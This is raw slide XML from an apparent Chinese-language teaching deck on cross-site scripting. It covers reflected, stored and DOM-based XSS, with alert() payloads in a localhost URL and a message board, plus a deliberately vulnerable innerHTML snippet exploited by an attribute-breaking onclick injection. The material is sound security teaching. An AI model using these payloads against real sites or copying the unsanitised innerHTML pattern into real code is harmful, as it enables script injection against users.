            <a:r>
              <a:rPr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XSS从效果 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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上来说也是反射型XSS。单独划分出来，是因为DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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型</a:t>
            </a:r>
            <a:r>
              <a:rPr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XSS的形成原因比较特别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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endParaRPr sz="132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1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN"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他</a:t>
            </a:r>
            <a:r>
              <a:rPr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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1325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修改页面的DOM节点形成的XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr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，称之为DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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型</a:t>
            </a:r>
            <a:r>
              <a:rPr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XSS。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3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 bldLvl="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="21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6343" y="-70"/>
            <a:ext cx="11518986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90">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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577850" y="1318260"/>
            <a:ext cx="8813800" cy="4648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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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 反射型XSS只是</a:t>
            </a:r>
            <a:r>
              <a:rPr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简单地把用户输入的数据“反射”给浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr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 defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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 也就是说，黑客往往需要</a:t>
            </a:r>
            <a:r>
              <a:rPr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诱使用户“点击”一个恶意链接</a:t>
            </a:r>
            <a:r>
              <a:rPr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，才能攻击成功。反射型XSS也叫做“非持久型XSS”</a:t>
            </a:r>
            <a:r>
              <a:rPr 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 defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr 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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="12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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="12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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr 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刚才的例子，就属于反射型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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr 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 用户点击恶意链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr 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http://127.0.0.1/test.php?param=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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&lt;script&gt;alert("xss")&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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服务器把用户输入的数据“反射”给浏览器：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="1325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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="132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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="132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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="132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占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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145" y="3468370"/>
            <a:ext cx="2077085" cy="16840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70" y="3468370"/>
            <a:ext cx="1995170" cy="180467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2592705" y="4243705"/>
            <a:ext cx="4614545" cy="38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 flipV="1">
            <a:off x="2598420" y="4671695"/>
            <a:ext cx="4530725" cy="82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599055" y="3931285"/>
            <a:ext cx="491109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http://127.0.0.1/test.php?param=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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&lt;script&gt;alert("xss")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337945" y="5273040"/>
            <a:ext cx="10648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用户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021320" y="5161280"/>
            <a:ext cx="10648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服务器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57245" y="4758690"/>
            <a:ext cx="35109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&lt;div&gt;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&lt;script&gt;alert("xss")&lt;/script&gt;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&lt;/div&gt;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991870" y="2098040"/>
            <a:ext cx="680085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73240" y="2804160"/>
            <a:ext cx="47053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在所有能输入的地方都写</a:t>
            </a:r>
            <a:r>
              <a:rPr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&lt;script&gt;alert('XSS')&lt;/script&gt;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然后提交留言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、查看留言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" y="1391285"/>
            <a:ext cx="6022975" cy="45796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319530"/>
            <a:ext cx="6260465" cy="4726305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="对角圆角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729730" y="2459355"/>
            <a:ext cx="4428490" cy="1561465"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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504453" y="288518"/>
            <a:ext cx="6120680" cy="647700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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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存储型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把用户输入的数据“存储”在服务器端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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991870" y="2098040"/>
            <a:ext cx="680085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85" y="1811655"/>
            <a:ext cx="10409555" cy="43281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8775" y="1243330"/>
            <a:ext cx="6266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查看留言板时，代码</a:t>
            </a:r>
            <a:r>
              <a:rPr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&lt;script&gt;alert('XSS')&lt;/script&gt;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被执行，出现弹窗：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504453" y="288518"/>
            <a:ext cx="6120680" cy="647700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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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存储型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把用户输入的数据“存储”在服务器端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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991870" y="2098040"/>
            <a:ext cx="680085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8775" y="1243330"/>
            <a:ext cx="6266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关闭弹窗后，查看留言板：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35" y="1670050"/>
            <a:ext cx="6800215" cy="4333240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4453" y="288518"/>
            <a:ext cx="6120680" cy="647700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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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存储型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把用户输入的数据“存储”在服务器端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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991870" y="2098040"/>
            <a:ext cx="680085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87920" y="2098040"/>
            <a:ext cx="43897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、右键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看一看HTML源码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sz="12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、主题为：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&lt;script&gt;alert('XSS')&lt;/script&gt;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、反馈内容为：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&amp;nbsp; &amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;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内容进行了转义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0" y="1151255"/>
            <a:ext cx="6533515" cy="12668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0" y="2512060"/>
            <a:ext cx="6840220" cy="3743325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="对角圆角矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7423150" y="1858010"/>
            <a:ext cx="3872865" cy="264922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656715" y="1223645"/>
            <a:ext cx="1727835" cy="288290"/>
          </a:xfrm>
          <a:prstGeom prst="round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1022350" y="3152140"/>
            <a:ext cx="2469515" cy="224155"/>
          </a:xfrm>
          <a:prstGeom prst="round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1656715" y="1569720"/>
            <a:ext cx="2098675" cy="213995"/>
          </a:xfrm>
          <a:prstGeom prst="round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3176270" y="3748405"/>
            <a:ext cx="3155950" cy="223520"/>
          </a:xfrm>
          <a:prstGeom prst="round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4453" y="288518"/>
            <a:ext cx="6120680" cy="647700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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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存储型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把用户输入的数据“存储”在服务器端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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4" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2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991870" y="2098040"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="1233805"/>
            <a:ext cx="4160520" cy="4938395"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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&lt;script&gt;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function test(){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var str = document.getElementById("text").value;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document.getElementById("t").innerHTML ="&lt;a href='"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+str+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"' &gt;testLink&lt;/a&gt;";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}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&lt;/script&gt;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&lt;div id="t" &gt;&lt;/div&gt;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&lt;input type="text" id="text" value="" /&gt;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&lt;input type="button" id="s" value="write" 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onclick="test()"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/&gt;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代码作用：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把用户的输入作为testLink的链接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89150" y="1637030"/>
            <a:ext cx="23863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rgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>例子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309235" y="1233805"/>
            <a:ext cx="53746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、在文本框输入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hahaha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，点击“write”按钮后</a:t>
            </a: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会在当前页面插入一个超链接，其地址为用户输入的内容：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234940" y="3522980"/>
            <a:ext cx="46710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、查看元素，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testLink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的地址为刚刚输入的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hahaha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90" y="1327150"/>
            <a:ext cx="803910" cy="8743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345" y="1694180"/>
            <a:ext cx="4657725" cy="14097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470" y="3798570"/>
            <a:ext cx="4772025" cy="1809750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="288518"/>
            <a:ext cx="612068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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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——Dom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型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改页面的DOM节点形成的XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，不经过服务器处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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991870" y="2098040"/>
            <a:ext cx="680085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95850" y="1178560"/>
            <a:ext cx="5588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构造如下数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr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' onclick=alert("xss") //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点击“write”按钮</a:t>
            </a:r>
            <a:endParaRPr sz="1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95850" y="3638550"/>
            <a:ext cx="53746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、点击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testLink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，脚本被执行，出现弹窗：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630" y="1794510"/>
            <a:ext cx="4533265" cy="11620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630" y="4010025"/>
            <a:ext cx="5970270" cy="20974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89150" y="1637030"/>
            <a:ext cx="23863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rgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>例子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90" y="1327150"/>
            <a:ext cx="803910" cy="874395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504453" y="288518"/>
            <a:ext cx="6120680" cy="647700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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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——Dom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型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改页面的DOM节点形成的XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，不经过服务器处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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" name="对角圆角矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="1233805"/>
            <a:ext cx="4160520" cy="4938395"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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&lt;script&gt;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function test(){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var str = document.getElementById("text").value;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document.getElementById("t").innerHTML ="&lt;a href='"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+str+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"' &gt;testLink&lt;/a&gt;";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}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&lt;/script&gt;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&lt;div id="t" &gt;&lt;/div&gt;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&lt;input type="text" id="text" value="" /&gt;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&lt;input type="button" id="s" value="write" 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onclick="test()"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/&gt;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代码作用：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把用户的输入作为testLink的链接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991870" y="2098040"/>
            <a:ext cx="680085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82870" y="1250315"/>
            <a:ext cx="5588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、将用户输入的数据拼接到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str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中：</a:t>
            </a:r>
            <a:r>
              <a:rPr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' onclick=alert("xss") //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&lt;a href='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"+str+"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' &gt;testLink&lt;/a&gt;"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&lt;a href='</a:t>
            </a:r>
            <a:r>
              <a:rPr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' onclick=alert("xss") //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' &gt;testLink&lt;/a&gt;"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首先用一个单引号闭合掉href的第一个单引号，然后插入一个onclick事件，最后再用注释符“//”注释掉第二个单引号。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182870" y="3566795"/>
            <a:ext cx="53746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、查看元素：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815" y="3935730"/>
            <a:ext cx="4257040" cy="17335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089150" y="1637030"/>
            <a:ext cx="23863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rgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92410D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>例子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1327150"/>
            <a:ext cx="803910" cy="874395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="对角圆角矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="1233805"/>
            <a:ext cx="4160520" cy="4938395"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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&lt;script&gt;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function test(){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var str = document.getElementById("text").value;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document.getElementById("t").innerHTML ="&lt;a href='"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+str+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"' &gt;testLink&lt;/a&gt;";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}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&lt;/script&gt;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&lt;div id="t" &gt;&lt;/div&gt;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&lt;input type="text" id="text" value="" /&gt;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&lt;input type="button" id="s" value="write" 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onclick="test()"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/&gt;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代码作用：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把用户的输入作为testLink的链接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占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="288518"/>
            <a:ext cx="612068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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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——Dom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型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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
